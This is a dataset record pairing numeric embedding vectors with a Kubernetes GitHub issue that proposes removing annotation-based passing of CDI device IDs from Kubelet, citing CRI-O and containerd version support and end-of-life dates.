0.017148423939943314, 0.0028929973486810923, -0.007473132573068142, 0.009938130155205727, 0.0053100441582500935, 0.012530994601547718, -0.017432574182748795, -0.001357701956294477, -0.01561401691287756, -0.023740693926811218, 0.02213524840772152, -0.0035856119357049465, -0.0014056521467864513, 0.009469282813370228, 0.009767640382051468, -0.024678386747837067, 0.006531887222081423, 0.01178510207682848, 0.0050187911838293076, -0.009206444956362247, -0.005356218665838242, 0.00411661621183157, 0.025644494220614433, 0.0168926902115345, 0.0014713617274537683, -0.034467339515686035, -0.00030834664357826114, -0.029466306790709496, 0.029807286337018013, -0.00638270890340209, 0.02426636964082718, -0.023456543684005737, -0.016835859045386314, -0.0072600203566253185, -0.008353996090590954, -0.002354889176785946, -0.008915191516280174, -0.007686244789510965, 0.015088340267539024, -0.004432732705026865, 0.023982219398021698, 0.02052980288863182, -0.02871331013739109, -0.01302825566381216, 0.01696372777223587, -0.0012804488651454449, -0.016736406832933426, 0.0007543282117694616, 0.025402968749403954, 0.017091594636440277, -0.00799170508980751, -0.014562663622200489, -0.00855290051549673, -0.007128601428121328, 0.0017164407763630152, -0.004070442169904709, -0.02094181999564171, 0.019350582733750343, -0.0004706226463895291, 0.014434795826673508, 0.005672335159033537, 0.004162790719419718, -0.004535736981779337, 0.01797245815396309, -0.008048535324633121, 0.015997618436813354, 0.026425905525684357, 0.013227161020040512, 0.000161499046953395, -0.011096038855612278, -0.016977934166789055, 0.010343043133616447, -0.004695571027696133, -0.003921263385564089, -0.003970989491790533, 0.03128486126661301, -0.00781411211937666, 0.017887212336063385, -0.006020418368279934, -0.025644494220614433, 0.012367608025670052, -0.002626607194542885, 0.013163226656615734, 0.0024614452850073576, -0.0055267084389925, 0.005551571492105722, 0.00024019514967221767, 0.009220652282238007, 0.010101515799760818, -0.015656638890504837, -0.002443685894832015, 0.0009856437100097537, -0.02280299924314022, -0.011266528628766537, -0.00780700845643878, -0.014676323160529137, -0.005693646147847176, -0.00390350422821939, -0.017148423939943314, -0.010641399770975113, 0.0040810974314808846, 0.0055870902724564075, -0.004045579116791487, 0.012651757337152958, -0.0016178763471543789, 0.03156901150941849, 0.0021897272672504187, 0.024976743385195732, 0.005842824466526508, 0.0008870793390087783, -0.02017461694777012, -0.010918445885181427, -0.021865306422114372, 0.01619652286171913, -0.006222874857485294, -0.023627033457159996, 0.003487935522571206, 0.009725017473101616, 0.01964893937110901, -0.008339788764715195, 0.01027910877019167, 0.01751781813800335, 0.015059924684464931, 0.018057702109217644, 0.006986526306718588, -0.00927037838846445, 0.006972318980842829, 0.021325422450900078, 0.0037543256767094135, -0.0069332486018538475, 0.007586792577058077, 0.033273909240961075, 0.010250694118440151, 0.023896975442767143, 0.006975871045142412, -0.0009483490721322596, -0.013170330785214901, 0.008162194862961769, 0.016480673104524612, -0.001745743677020073, -0.029636796563863754, -0.006190907675772905, -0.011621715500950813, -0.008162194862961769, -0.02276037633419037, 0.01577029936015606, 0.030688149854540825, 0.005750475917011499, 0.03108595870435238, -0.03077339380979538, 0.012040836736559868, 0.017674101516604424, 0.005992003250867128, 0.0026834371965378523, 0.007267124019563198, -0.016850067302584648, 0.012481268495321274, 0.029608380049467087, 0.027747200801968575, 0.009646876715123653, -0.017674101516604424, 0.003372499719262123, -0.010882927104830742, 0.010868719778954983, -0.020274069160223007, -0.038104452192783356, -0.011273632757365704, 0.009888404048979282, -0.0018665072275325656, -0.00008352442091563717, 0.012481268495321274, 0.004258690867573023, -0.00886546541005373, 0.003491487354040146, -0.0344105064868927, 0.00561195332556963, -0.012729899026453495, -0.012268155813217163, 0.005345562938600779, -0.007057563867419958, -0.015017302706837654, 0.005800202488899231, 0.0022554369643330574, 0.004223172552883625, 0.007302642799913883, 0.008993332274258137, 0.015926580876111984, 0.014619492925703526, 0.02160957083106041, 0.014022779650986195, 0.013021152466535568, 0.02500515803694725, -0.007892252877354622, 0.008332684636116028, -0.0121900150552392, -0.01976259984076023, -0.006219322793185711, 0.021723231300711632, 0.00949769839644432, 0.010946860536932945, 0.022774584591388702, -0.006421779282391071, -0.007057563867419958, 0.011309151537716389, 0.01873966120183468, 0.005569330882281065, 0.006531887222081423, 0.006634891498833895, -0.003796948119997978, -0.007093082647770643, -0.016068655997514725, 0.00561195332556963, -0.0009767640149220824, 0.011444122530519962, 0.007565481122583151, 0.00573626859113574, 0.017091594636440277, 0.014846812933683395, -0.00014518265379592776, 0.008439240977168083, 0.011358877643942833, -0.009469282813370228, -0.004244483541697264, 0.02146749757230282, -0.001640075584873557, 0.014946265146136284, 0.02266092412173748, -0.018000872805714607, -0.0018256606999784708, 0.004912234842777252, 0.006766310427337885, 0.012317881919443607, 0.010272005572915077, 0.012140288949012756, -0.00921354815363884, 0.007466028910130262, 0.00595293240621686, 0.008545797318220139, 0.0030972298700362444, -0.0034719521645456553, 0.003928367048501968, -0.01971997693181038, -0.010882927104830742, 0.045549169182777405, -0.015685053542256355, -0.006787621881812811, -0.01964893937110901, -0.006673961877822876, 0.03165425732731819, -0.029807286337018013, 0.01919430121779442, -0.000840017048176378, -0.003836018731817603, -0.00942666083574295, -0.0027100760489702225, -0.004056234378367662, 0.004191205371171236, -0.0015450631035491824, 0.009760536253452301, 0.013681800104677677, 0.013021152466535568, -0.01042118389159441, 0.0175604410469532, -0.0034097942989319563, -0.024422651156783104, -0.026496943086385727, 0.020274069160223007, 0.0033582921605557203, -0.00390350422821939, -0.010698230005800724, -0.0061340779066085815, -0.026141757145524025, 0.02699420601129532, -0.009227756410837173, -0.018725454807281494, -0.0015486149350181222, 0.01171406451612711, -0.01703476347029209, 0.014356655068695545, -0.007529962342232466, 0.01425009872764349, 0.0036548732314258814, 0.011799309402704239, -0.02986411564052105, 0.013163226656615734, 0.01040697656571865, 0.00757968844845891, 0.008275855332612991, -0.012630446814000607, 0.016352806240320206, 0.0025040677282959223, -0.000828029471449554, 0.008993332274258137, -0.003736566286534071, -0.009000436402857304, -0.006848003715276718, 0.01141570694744587, 0.023101355880498886, 0.011422811076045036, 0.0006761871045455337, 0.0018522997852414846, 0.003658425295725465, 0.019606318324804306, 0.026312246918678284, -0.005700749810785055, 0.011039209552109241, 0.0038218111731112003, 0.02213524840772152, -0.023058734834194183, 0.027889275923371315, -0.0011605732142925262, 0.0002894773206207901, 0.0012582496274262667, -0.010328835807740688, -0.005881895311176777, -0.00045597119606100023, 0.007487339898943901, 0.009533216245472431, -0.02923898585140705, -0.007856734097003937, -0.0039780936203897, -0.006187356077134609, 0.024110088124871254, -0.02115493267774582, -0.007551273796707392, 0.010378561913967133, -0.007600999902933836, 0.0035145743750035763, 0.012530994601547718, -0.02651115134358406, 0.001006954931654036, -0.0009616685565561056, 0.005242558661848307, -0.008929398842155933, 0.010229382663965225, -0.015784505754709244, -0.02357020415365696, 0.03460941091179848, -0.014029882848262787, -0.023200809955596924, -0.002447237726300955, 0.010392769239842892, 0.012964322231709957, -0.007288435474038124, 0.006673961877822876, 0.007586792577058077, 0.005075620952993631, -0.006453745998442173, 0.0009714362095110118, -0.003280151169747114, -0.003867985447868705, 0.011429915204644203, 0.016068655997514725, -0.0021915032994002104, -0.00390705605968833, 0.006730792112648487, 0.011159972287714481, -0.013035359792411327, -0.0002189949300372973, -0.0020085819996893406, -0.03148376941680908, 0.009227756410837173, -0.013965949416160583, 0.0032623917795717716, 0.021566949784755707, -0.010229382663965225, -0.008829946629703045, -0.002518275287002325, -0.0032250971999019384, 0.0008648801012896001, 0.002846823073923588, -0.010669814422726631, -0.0034080184996128082, -0.00872339028865099, -0.009717914275825024, 0.021907929331064224, -0.014413485303521156, 0.05165838450193405, -0.008957813493907452, 0.007430510129779577, 0.0003349856415297836, -0.013802563771605492, -0.009256171062588692, -0.01447741873562336, -0.009923921898007393, -0.0201462022960186, 0.004929994232952595, -0.010797682218253613, -0.015045717358589172, 0.013212952762842178, -0.00659937271848321, 0.00630456767976284, -0.00887967273592949, -0.010016270913183689, -0.028088180348277092, -0.006982974708080292, -0.0029942255932837725, -0.00638270890340209, 0.004063338041305542, 0.024564726278185844, -0.014718945138156414, 0.01092554908245802, -0.004049130715429783, 0.017333121970295906, -0.01113866176456213, -0.004759504459798336, -0.043759025633335114, 0.02469259314239025, -0.0018949221121147275, 0.00652123149484396, -0.019279545173048973, -0.003796948119997978, 0.022192077711224556, 0.005551571492105722, 0.016551710665225983, -0.01398726087063551, -0.019364790990948677, 0.0017244324553757906, 0.010080204345285892, -0.016949519515037537, -0.0048696123994886875, -0.01964893937110901, 0.0063542937859892845, -0.007558377459645271, -0.006045281421393156, 0.0027811136096715927, 0.008396618999540806, -0.0015486149350181222, 0.015969203785061836, 0.008474759757518768, 0.03483673185110092, 0.007345265243202448, 0.001850523753091693, 0.015500356443226337, 0.001423411536961794, -0.012253948487341404, -0.005093380343168974, -0.006631339434534311, 0.00504365423694253, -0.003988748881965876, -0.004073993768543005, -0.014044090174138546, 0.00015206440002657473, -0.012928803451359272, -0.0030439519323408604, -0.005270973779261112, 0.02108389511704445, 0.007185431197285652, 0.002832615515217185, -0.020430350676178932, -0.013504206202924252, -0.007444717455655336, 0.012864870019257069, 0.023740693926811218, -0.00041712261736392975, 0.007856734097003937, 0.0013470463454723358, 0.004272898659110069, -0.019222715869545937, 0.009746328927576542, 0.011650131084024906, 0.010449598543345928, -0.001955303829163313, 0.012800936587154865, 0.007586792577058077, -0.010172553360462189, 0.002951603149995208, 0.010818993672728539, 0.006570958066731691, -0.01391622330993414, -0.006602924782782793, 0.012886181473731995, -0.009852885268628597, 0.01679323799908161, 0.011621715500950813, 0.004777263849973679, 0.018654417246580124, -0.008013016544282436, 0.002118689939379692, -0.021765854209661484, 0.0015672622248530388, -0.018597586080431938, -0.036314308643341064, 0.012111873365938663, -0.02902587503194809, -0.033558059483766556, 0.012161599472165108, 0.022547265514731407, -0.02074291557073593, -0.003184250555932522, 0.006332982797175646, 0.02318660169839859, 0.00872339028865099, 0.012040836736559868, -0.012076354585587978, 0.028244463726878166, 0.010698230005800724, -0.0034968152176588774, -0.000452197331469506, 0.01744678057730198, 0.008126676082611084, 0.009639772586524487, -0.01919430121779442, 0.027164695784449577, -0.0029373958241194487, 0.016622748225927353, -0.015130962245166302, -0.011252321302890778, 0.0018682831432670355, -0.010541947558522224, 0.008858361281454563, 0.008545797318220139, 0.02052980288863182, -0.010272005572915077, 0.03696785494685173, 0.012388919480144978, -0.0012742329854518175, 0.013227161020040512, 0.04333280399441719, -0.0009643324883654714, -0.004042027052491903, -0.011039209552109241, 0.0039532301016151905, -0.00814798753708601, 0.003839570563286543, -0.022533057257533073, -0.01547194179147482, 0.00966818816959858, 0.013717318885028362, 0.01909484900534153, -0.0039532301016151905, -0.0005856144125573337, 0.010790578089654446, -0.004308417439460754, 0.043872687965631485, -0.020870782434940338, -0.0015290796291083097, 0.014832605607807636, 0.011763790622353554, -0.01730470545589924, -0.014072505757212639, 0.02548821270465851, 0.011195491068065166, 0.007451821584254503, 0.014242995530366898, 0.012218429706990719, 0.0073523689061403275, -0.03901372849941254, 0.006105662789195776, -0.020274069160223007, -0.014591078273952007, -0.009391142055392265, 0.025303514674305916, 0.005356218665838242, -0.00201923749409616, -0.012935907579958439, -0.004010060336440802, 0.01804349571466446, 0.013085085898637772, -0.032052066177129745, 0.01349710300564766, -0.001769718830473721, -0.014257202856242657, 0.0040917531587183475, -0.028230255469679832, 0.024294784292578697, -0.006986526306718588, 0.01454845629632473, 0.004045579116791487, 0.008084054104983807, -0.01433534361422062, 0.005551571492105722, 0.009959440678358078, -0.00855290051549673, 0.014285617507994175, -0.0005767347756773233, 0.0038111554458737373, 0.006105662789195776, 0.005757580045610666, -0.009057266637682915, 0.01842709630727768 ]
null
null
null
null
null
null
null
null
null
[ "kubernetes", "kubernetes" ]
Kubelet should stop using annotations to pass CDI device IDs to CRI runtimes. CDIDevices CRI field should be used for this purpose. This should be done when Kubelet that doesn't support CRI field reaches EOL and two major CRI runtimes support CRI field. Here is a PR comment that gives more details about this: https://github.com/kubernetes/kubernetes/pull/115891/files#r1112169121 - Kubelet started using CDIDevices CRI field in [v1.28.0](https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.28.md#api-change-2). Previous version 1.27 will reach EOL [2024-06-28](https://kubernetes.io/releases/patch-releases/#1-27). - CRI-O started using it in [v1.28.0](https://github.com/cri-o/cri-o/releases/tag/v1.28.0). Previous version 1.27 will reach EOL [2024-06-28](https://kubernetes.io/releases/patch-releases/#1-27) together with Kubernetes 1.27. - Containerd started using it in [1.7.2](https://github.com/containerd/containerd/releases/tag/v1.7.2). Version 1.7 will reach EOL in a 6 months after Containerd 2.0 release https://github.com/containerd/containerd/blob/main/RELEASES.md. Previous version 1.6 doesn't support CDI injections and should not be considered. So, safer option would be to wait until Containerd 1.7 reaches EOL. However it's relatively safe to do it earlier when 1.7.0 and 1.7.1 have little chances to be in real use. Containerd v1.7.0 and v1.7.1 is not used by the Linux distributions from [this long list](https://pkgs.org/search/?q=containerd), so it's safe to remove annotations support from the Kubelet in 1.31 in my opinion.
Passing CDI devices as annotations should be removed
https://api.github.com/repos/kubernetes/kubernetes/issues/125210/comments
3
2024-05-30T05:16:46
2024-06-03T13:25:25Z
https://github.com/kubernetes/kubernetes/issues/125210
2,324,722,852
125,210
false
This is a GitHub Issue repo:kubernetes owner:kubernetes Title : Passing CDI devices as annotations should be removed Issue date: --- start body --- Kubelet should stop using annotations to pass CDI device IDs to CRI runtimes. CDIDevices CRI field should be used for this purpose. This should be done when Kubelet that doesn't support CRI field reaches EOL and two major CRI runtimes support CRI field. Here is a PR comment that gives more details about this: https://github.com/kubernetes/kubernetes/pull/115891/files#r1112169121 - Kubelet started using CDIDevices CRI field in [v1.28.0](https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.28.md#api-change-2). Previous version 1.27 will reach EOL [2024-06-28](https://kubernetes.io/releases/patch-releases/#1-27). - CRI-O started using it in [v1.28.0](https://github.com/cri-o/cri-o/releases/tag/v1.28.0). Previous version 1.27 will reach EOL [2024-06-28](https://kubernetes.io/releases/patch-releases/#1-27) together with Kubernetes 1.27. - Containerd started using it in [1.7.2](https://github.com/containerd/containerd/releases/tag/v1.7.2). Version 1.7 will reach EOL in a 6 months after Containerd 2.0 release https://github.com/containerd/containerd/blob/main/RELEASES.md. Previous version 1.6 doesn't support CDI injections and should not be considered. So, safer option would be to wait until Containerd 1.7 reaches EOL. However it's relatively safe to do it earlier when 1.7.0 and 1.7.1 have little chances to be in real use. Containerd v1.7.0 and v1.7.1 is not used by the Linux distributions from [this long list](https://pkgs.org/search/?q=containerd), so it's safe to remove annotations support from the Kubelet in 1.31 in my opinion. --- end body ---
1,760
[ -0.03875309228897095, -0.060058657079935074, -0.011077453382313251, -0.000955511350184679, -0.03446318954229355, -0.0039012215565890074, -0.024688541889190674, 0.03120977245271206, 0.0034549564588814974, -0.010609595105051994, -0.012912899255752563, -0.0544731467962265, 0.031238563358783722, 0.00850783009082079, 0.008212719112634659, 0.03207351267337799, -0.017951376736164093, 0.0013261993881314993, 0.004865730181336403, -0.004250315949320793, 0.016986869275569916, 0.03403132036328316, -0.008198323659598827, 0.011782840825617313, 0.04456893727183342, 0.030202075839042664, -0.03429044038057327, 0.02712140791118145, -0.057668980211019516, -0.016742141917347908, 0.0016968874260783195, 0.005258011631667614, 0.0257682166993618, 0.005679084453731775, 0.021319959312677383, 0.0227163378149271, 0.03250538185238838, 0.036190666258335114, -0.03976079076528549, -0.05274566635489464, -0.0227163378149271, -0.04762081429362297, 0.0302884504199028, 0.07105693221092224, -0.02784118987619877, 0.004599410574883223, -0.025955360382795334, -0.01401416677981615, -0.03561484068632126, -0.007831234484910965, -0.030777903273701668, -0.03037482500076294, -0.018181707710027695, -0.050615109503269196, 0.016900494694709778, 0.014942686073482037, 0.03918496146798134, 0.02429986000061035, -0.013438340276479721, 0.0016078143380582333, -0.017706651240587234, -0.0005618802970275283, -0.008831731975078583, 0.018498411402106285, -0.004718174692243338, 0.023176997900009155, -0.04825422540307045, 0.0049521042965352535, -0.06040415167808533, -0.007478540763258934, -0.03175680711865425, 0.004689383320510387, 0.01776423305273056, 0.023939969018101692, 0.012581799179315567, -0.04140189290046692, 0.03215988352894783, 0.02366645075380802, -0.024918872863054276, -0.018527204170823097, -0.020197099074721336, 0.016943681985139847, -0.043993111699819565, 0.002918718382716179, 0.014755542390048504, -0.014985873363912106, -0.000909175374545157, -0.046843450516462326, 0.0079104108735919, -0.024127112701535225, -0.015432137995958328, 0.024674147367477417, -0.022140512242913246, -0.036305833607912064, -0.011149431578814983, -0.022414028644561768, -0.058187223970890045, -0.0005218423902988434, -0.033685825765132904, -0.0010814733104780316, -0.03604670986533165, -0.009011677466332912, -0.03057636320590973, 0.01692928560078144, 0.016583791002631187, 0.020312264561653137, 0.009861021302640438, 0.019491711631417274, -0.036852866411209106, 0.11407114565372467, 0.019952373579144478, -0.014525212347507477, -0.029036028310656548, -0.02854657731950283, -0.011574103496968746, 0.011271795257925987, 0.025825798511505127, -0.010213715024292469, -0.04333091154694557, -0.007492936681956053, 0.018613576889038086, -0.027466902509331703, -0.017505113035440445, 0.009897010400891304, -0.02906482107937336, -0.004754163790494204, 0.014841916970908642, -0.021636664867401123, 0.0300581194460392, 0.010480034165084362, 0.011314981617033482, 0.0028215476777404547, -0.007759256288409233, -0.00025979653582908213, 0.010343275964260101, 0.023853594437241554, -0.001007695565931499, 0.03178559988737106, -0.012445040978491306, -0.015101037919521332, 0.0023123014252632856, -0.0494922511279583, -0.016367856413125992, 0.016166316345334053, -0.014042957685887814, 0.0064636473543941975, 0.004966499749571085, 0.02140633389353752, -0.007021478842943907, -0.015964778140187263, -0.002153949346393347, -0.030029328539967537, 0.01158130168914795, -0.00006911037053214386, 0.05484743043780327, -0.018815116956830025, -0.025509094819426537, -0.009897010400891304, -0.024990851059556007, -0.03892584145069122, -0.0302884504199028, 0.005042077042162418, -0.04206409305334091, 0.021737433969974518, -0.009450744837522507, 0.011314981617033482, 0.0016429036622866988, 0.011847620829939842, -0.03855155408382416, 0.03682407736778259, 0.0009384165168739855, -0.005891420412808657, 0.0279131680727005, -0.01880072057247162, -0.01512982975691557, -0.020225889980793, 0.01140135619789362, 0.0003637151385191828, 0.04183376207947731, -0.03215988352894783, -0.022226884961128235, 0.01461158599704504, -0.03414648398756981, 0.03406011313199997, 0.020225889980793, -0.03342670202255249, 0.006128948647528887, -0.013524714857339859, 0.011516520753502846, 0.0049449061043560505, 0.01645422913134098, 0.007478540763258934, 0.013503121212124825, -0.00940036028623581, -0.04572058841586113, -0.0027045831084251404, -0.02573942393064499, -0.01672774739563465, 0.00025034937425516546, -0.021737433969974518, -0.02038424275815487, -0.018152916803956032, -0.023680847138166428, -0.007946399971842766, -0.023724034428596497, 0.00667958240956068, 0.013654275797307491, -0.01377663854509592, 0.05677644908428192, -0.017433132976293564, 0.001567326602526009, -0.02347930707037449, 0.02644481137394905, -0.01844082958996296, 0.036536164581775665, 0.021866993978619576, -0.004577816929668188, -0.004887323826551437, -0.026041733101010323, -0.04192013666033745, 0.030605154111981392, -0.03699682280421257, -0.002420268952846527, 0.0025858189910650253, -0.021795015782117844, 0.025667445734143257, 0.017836211249232292, -0.016511812806129456, -0.008925303816795349, -0.00775205809623003, 0.05884942412376404, 0.024170298129320145, 0.009623493067920208, 0.010105747729539871, -0.0031652438919991255, -0.025235576555132866, 0.005484743043780327, 0.00798958633095026, 0.020355451852083206, -0.019880395382642746, -0.007309392094612122, 0.05458831042051315, -0.08435852080583572, -0.01990918628871441, -0.029208777472376823, 0.031468894332647324, 0.019736438989639282, 0.04373398795723915, 0.010213715024292469, 0.049549832940101624, -0.00019085484382230788, 0.018138520419597626, -0.008774149231612682, -0.02018270269036293, -0.021478312090039253, -0.03282208368182182, 0.016554998233914375, 0.031584057956933975, 0.012790536507964134, 0.016526207327842712, 0.023407328873872757, 0.042726293206214905, -0.005052873864769936, -0.0010715762618929148, 0.006085761822760105, -0.028964050114154816, -0.0022313259541988373, 0.024199090898036957, 0.011487729847431183, -0.018426433205604553, -0.016367856413125992, -0.005743864923715591, -0.01638225093483925, 0.0002757667098194361, 0.00706826476380229, -0.012308281846344471, -0.000023491340471082367, 0.032102301716804504, 0.022730734199285507, 0.0038688313215970993, -0.014050155878067017, -0.04065331816673279, -0.005096060689538717, 0.033484283834695816, -0.001975803170353174, 0.020168308168649673, -0.01724599115550518, -0.02870492823421955, -0.019362151622772217, -0.01954929530620575, -0.005394770298153162, -0.027668442577123642, 0.004289904143661261, 0.00590941496193409, 0.05769776925444603, -0.016799725592136383, -0.022198094055056572, 0.009623493067920208, -0.041891343891620636, 0.0049700988456606865, -0.021233586594462395, -0.024645354598760605, 0.04019265994429588, 0.0012092347024008632, 0.02748129889369011, 0.0018219496123492718, -0.004800949711352587, 0.05887821316719055, -0.019578086212277412, -0.01954929530620575, 0.003465753048658371, -0.048081476241350174, 0.025437116622924805, -0.04857092723250389, 0.035586051642894745, 0.01962127350270748, 0.0201107244938612, -0.04911796376109123, -0.005214824806898832, -0.01466916874051094, 0.04160343110561371, -0.020528199151158333, -0.025667445734143257, 0.030432406812906265, 0.015417742542922497, -0.043791573494672775, -0.0277980025857687, -0.017145220190286636, -0.021463915705680847, -0.020197099074721336, -0.02124798111617565, 0.0065824114717543125, -0.005761859472841024, -0.013884605839848518, -0.022788316011428833, -0.03144010156393051, -0.035586051642894745, -0.019491711631417274, -0.00031175583717413247, -0.024040738120675087, 0.0026308053638786077, -0.018426433205604553, 0.0007116850465536118, -0.014913895167410374, -0.020758530125021935, -0.0481390580534935, -0.007478540763258934, 0.03529813885688782, 0.003876029048115015, -0.023061834275722504, 0.0008880317327566445, 0.004714576061815023, 0.0031994334422051907, -0.00856541283428669, 0.017389947548508644, 0.027538880705833435, -0.004948505200445652, -0.009249205701053143, 0.01672774739563465, -0.038839466869831085, 0.02153589390218258, -0.08355236053466797, 0.033484283834695816, 0.02863295003771782, 0.017001263797283173, 0.029237568378448486, -0.009054864756762981, 0.005916612688452005, -0.01629587821662426, -0.050730276852846146, -0.014928290620446205, -0.019635668024420738, -0.020211495459079742, 0.026617558673024178, -0.027524486184120178, -0.028892071917653084, -0.04744806885719299, 0.01629587821662426, -0.026300854980945587, 0.024213485419750214, 0.00904046930372715, 0.0021089629735797644, -0.015345764346420765, -0.04013507440686226, 0.02854657731950283, 0.028488993644714355, 0.017533903941512108, 0.036190666258335114, -0.015734447166323662, -0.021795015782117844, -0.02212611585855484, 0.01986599899828434, -0.009645086713135242, -0.0388682596385479, -0.019016655161976814, 0.04877246543765068, -0.01425169501453638, -0.00832788459956646, 0.017461925745010376, -0.01641104184091091, 0.0026056128554046154, 0.005923810414969921, -0.0019416135037317872, 0.03215988352894783, -0.01324399933218956, 0.01927577704191208, -0.06570175290107727, -0.00951552577316761, -0.01335916481912136, -0.032447800040245056, 0.008536620996892452, -0.0035431296564638615, -0.00015722750686109066, -0.002715379698202014, 0.024846894666552544, 0.02061457373201847, 0.016267085447907448, -0.012675371021032333, -0.05663249269127846, 0.045893337577581406, 0.004178337752819061, -0.004592212848365307, -0.0032984036952257156, 0.037457484751939774, 0.034520771354436874, 0.001639304799027741, 0.03290845826268196, 0.004736169241368771, 0.053033579140901566, -0.026200085878372192, -0.048283014446496964, 0.013913396745920181, 0.0332251638174057, -0.012696964666247368, -0.0026056128554046154, -0.005765458568930626, 0.014143727719783783, 0.020211495459079742, 0.0009060263400897384, 0.016079941764473915, -0.026401624083518982, -0.024688541889190674, -0.027063824236392975, 0.036968033760786057, -0.01649741642177105, -0.03552846610546112, -0.025595467537641525, -0.022198094055056572, -0.03247658908367157, -0.02732294611632824, -0.0483693890273571, 0.017116429284214973, -0.000891180825419724, -0.021391937509179115, -0.013755044899880886, -0.008399862796068192, 0.012344270944595337, -0.0316416434943676, 0.044972013682127, -0.015835216268897057, 0.003363184165209532, 0.028373828157782555, -0.04695861414074898, 0.02621448040008545, 0.03417527675628662, 0.0011876412900164723, 0.002387878717854619, -0.053235117346048355, 0.013409549370408058, 0.0005285903462208807, 0.0276828370988369, 0.04721773788332939, 0.03918496146798134, 0.005693480372428894, -0.01887269876897335, 0.021910181269049644, 0.024011947214603424, -0.04312937334179878, -0.004491443280130625, 0.0032444200478494167, -0.003293005283921957, -0.004408668261021376, -0.022054137662053108, -0.010285693220794201, -0.021579081192612648, 0.011948390863835812, -0.021190399304032326, 0.021910181269049644, -0.01895907334983349, 0.023464912548661232, 0.05435797944664955, 0.002303304150700569, -0.04436739906668663, -0.041056398302316666, 0.02140633389353752, 0.012344270944595337, 0.007449749391525984, -0.012790536507964134, 0.03334032744169235, -0.01566246896982193, -0.013258394785225391, 0.014913895167410374, -0.0032354227732867002, -0.01927577704191208, -0.017317969352006912, -0.011228607967495918, -0.012941691093146801, 0.020888090133666992, 0.01882951147854328, -0.007651288527995348, 0.012178720906376839, 0.0375150665640831, 0.0019668058957904577, -0.020283473655581474, 0.002198935719206929, -0.00880294106900692, -0.008003981783986092, -0.0005996688269078732, 0.016641372814774513, 0.011257399804890156, 0.023061834275722504, -0.007831234484910965, 0.018311267718672752, 0.010861518792808056, -0.0300581194460392, 0.012452238239347935, 0.01986599899828434, -0.012639381922781467, 0.0158208217471838, -0.024890081956982613, 0.019880395382642746, -0.0004132001777179539, -0.0101129449903965, 0.014676366932690144, -0.043042998760938644, 0.020960068330168724, -0.004865730181336403, -0.007708871271461248, -0.006431257352232933, 0.0064636473543941975, 0.00008665507630212232, 0.036968033760786057, -0.027063824236392975, 0.011782840825617313, -0.026819098740816116, 0.030835485085844994, -0.03417527675628662, 0.010955090634524822, 0.003753666067495942, 0.0068811215460300446, 0.0030806693248450756, 0.0006487040664069355, 0.009652283973991871, 0.044424980878829956, -0.01342394482344389, -0.024803707376122475, 0.04572058841586113, 0.01618071272969246, -0.016871703788638115, -0.029208777472376823, -0.010321682319045067, -0.008687775582075119, 0.010976684279739857, -0.04393552988767624, 0.003242620499804616, -0.015532908029854298, 0.000447614787844941, -0.0016348061617463827, -0.013611088506877422, -0.006841533351689577, 0.01816731132566929, -0.044424980878829956, -0.012610591016709805, -0.01466916874051094, 0.01106305792927742, 0.0025840194430202246, 0.02006753720343113, 0.01717401295900345, -0.013877407647669315, 0.006110954098403454, -0.02124798111617565, 0.020513802766799927, -0.007644090801477432, 0.009198821149766445, 0.011228607967495918, -0.002267315052449703, 0.008774149231612682, 0.0015178414760157466, 0.0009609097614884377, 0.013755044899880886, -0.011250201612710953, 0.0017166814068332314, 0.023364141583442688, -0.029683833941817284, 0.020902486518025398, 0.023493703454732895, -0.019736438989639282, -0.0006352080963551998, 0.008471840992569923, -0.014460431411862373, -0.007413760293275118, 0.042294424027204514, 0.009904208593070507, -0.034319233149290085, -0.0017958575626835227, 0.018296873196959496, -0.03806210309267044, 0.009825032204389572, -0.0032660134602338076, 0.004786554258316755, -0.0013504920061677694, 0.013697462156414986, -0.003580918302759528, -0.011250201612710953, 0.01088311243802309, 0.012221908196806908, 0.013963782228529453, -0.005945404060184956, 0.054185230284929276, -0.0011624488979578018, -0.004728971514850855, -0.017433132976293564, 0.018311267718672752, 0.005657490808516741, 0.04721773788332939, 0.03129614517092705, 0.023781616240739822, 0.003588116029277444, -0.0022295264061540365, 0.013459933921694756, -0.006809143349528313, -0.03267812728881836, 0.015705656260252, -0.014525212347507477, -0.04033661633729935, 0.0068739233538508415, 0.010947893373668194, 0.007255408447235823, -0.02216930314898491, -0.00048810255248099566, -0.02232765592634678, 0.023061834275722504, -0.015532908029854298, 0.04834059625864029, -0.02113281562924385, 0.01633906364440918, -0.008054367266595364, 0.032419007271528244, 0.0002699184697121382, 0.014575596898794174, 0.009630691260099411, -0.019794020801782608, -0.016036756336688995, 0.03584517166018486, 0.003033883636817336, -0.0021737434435635805, 0.03486626595258713, 0.02311941608786583, -0.019923580810427666, 0.01272575557231903, -0.038839466869831085, -0.0015070447698235512, -0.004714576061815023, 0.004117156378924847, 0.0150866424664855, 0.0127689428627491, -0.01201317086815834, -0.0158208217471838, -0.007658486720174551, 0.009954593144357204, 0.00816953182220459, 0.011214212514460087, -0.0005987691110931337, -0.02319139428436756, -0.004822543356567621, -0.008335081860423088, -0.0012200314085930586, -0.014028562232851982, -0.01336636207997799, -0.009234810248017311, 0.03414648398756981, -0.02470293827354908, -0.0017085839062929153, 0.037889353930950165, 0.005895019043236971, 0.00020333858265075833, -0.0043258932419121265, 0.007924806326627731, -0.017389947548508644, 0.010120143182575703, -0.016641372814774513, -0.010890310630202293, -0.020413033664226532, -0.04695861414074898, 0.024127112701535225, -0.004793751984834671, -0.008810138329863548, -0.012092347256839275, 0.011962786316871643, 0.00945794302970171, -0.016223900020122528, 0.03486626595258713, -0.016886098310351372, 0.03204471990466118, 0.0013792833779007196, 0.011070256121456623, 0.02133435569703579, 0.00827030185610056, 0.02074413374066353, 0.028057124465703964, -0.02894965559244156, -0.017793025821447372, -0.02176622487604618, 0.01713082566857338, 0.0009186225361190736, 0.004656993318349123, -0.0021791416220366955, 0.012617788277566433, -0.02786998078227043, -0.018613576889038086, -0.020369846373796463, 0.019002260640263557, -0.007622497621923685, -0.005718672648072243, -0.004131551831960678, -0.007492936681956053, 0.009702669456601143, -0.020758530125021935, -0.01760588213801384, 0.016051150858402252, 0.00645285053178668, 0.014798729680478573, 0.007939201779663563, -0.0026020139921456575, 0.004095562733709812, 0.015705656260252, 0.005092461593449116, 0.028618555516004562, 0.028373828157782555, -0.009947394952178001, 0.00048495351802557707, -0.01954929530620575, 0.019837208092212677, -0.014467629604041576, -0.0025174396578222513, -0.038119684904813766, 0.001393678947351873, 0.009825032204389572, -0.033800989389419556, 0.008493434637784958, 